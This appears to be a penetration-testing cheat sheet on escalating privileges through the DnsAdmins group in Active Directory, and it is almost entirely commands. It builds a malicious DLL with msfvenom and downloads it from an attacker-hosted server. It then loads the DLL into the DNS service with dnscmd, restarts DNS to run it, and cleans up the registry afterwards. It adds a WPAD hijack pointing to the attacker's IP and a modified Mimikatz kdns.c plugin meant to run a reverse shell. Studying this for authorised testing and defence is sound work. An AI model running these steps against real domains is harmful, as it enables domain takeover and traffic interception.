10.DNSadmins

Approach to Exploiting DnsAdmins

1. Generate a Malicious DLL

msfvenom -p windows/x64/exec cmd='<command>' -f dll -o <dll_name>.dll

2. Host DLL on an HTTP Server

python3 -m http.server <port>

3. Transfer DLL to Target Machine

wget "http://<attacker_ip>:<port>/<dll_name>.dll" -outfile "<dll_name>.dll"

4. Verify Membership in DnsAdmins Group

Get-ADGroupMember -Identity DnsAdmins

5. Load Custom DLL into DNS Server Configuration

dnscmd.exe /config /serverlevelplugindll <dll_path>

6. Check Permissions on DNS Service

Retrieve the Security Identifier (SID) of the user:

wmic useraccount where name="<user>" get sid

Check DNS service permissions:

sc.exe sdshow DNS

7. Restart DNS Service to Trigger Payload Execution

sc stop dns
sc start dns

8. Verify Exploitation

Check if the user was added to the Domain Admins group (if applicable):

net group "Domain Admins" /dom

9. Cleanup (if needed)

Check for the malicious DLL entry:

reg query \\<target_ip>\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

Remove the DLL entry from the registry:

reg delete \\<target_ip>\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll

Restart DNS service after cleanup:

sc.exe start dns
sc query dns

10. Alternative Exploit - WPAD Attack

Disable WPAD blocking:

Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName <dc_hostname>

Create a WPAD DNS record pointing to the attacker's IP:

Add-DnsServerResourceRecordA -Name wpad -ZoneName <domain_name> -ComputerName <dc_hostname> -IPv4Address <attacker_ip>

Commands Used:

• msfvenom

• python3 -m http.server

• wget

• dnscmd.exe

• wmic

• sc.exe

• net

• reg

• Set-DnsServerGlobalQueryBlockList

• Add-DnsServerResourceRecordA

PowerShell Cmdlets:

• Get-ADGroupMember

Using Mimilib.dll

As detailed in this post, we could also utilize mimilib.dll from the creator of the Mimikatz tool to gain command execution by modifying the kdns.c file to execute a reverse shell one-liner or another command of our choosing.

Code: c

/*	Benjamin DELPY `gentilkiwi`
	https://blog.gentilkiwi.com
	benjamin@gentilkiwi.com
	Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kdns.h"

DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction)
{
	return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginCleanup()
{
	return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)
{
	FILE * kdns_logfile;
#pragma warning(push)
#pragma warning(disable:4996)
	if(kdns_logfile = _wfopen(L"kiwidns.log", L"a"))
#pragma warning(pop)
	{
		klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);
		fclose(kdns_logfile);
	    system("ENTER COMMAND HERE");
	}
	return ERROR_SUCCESS;
}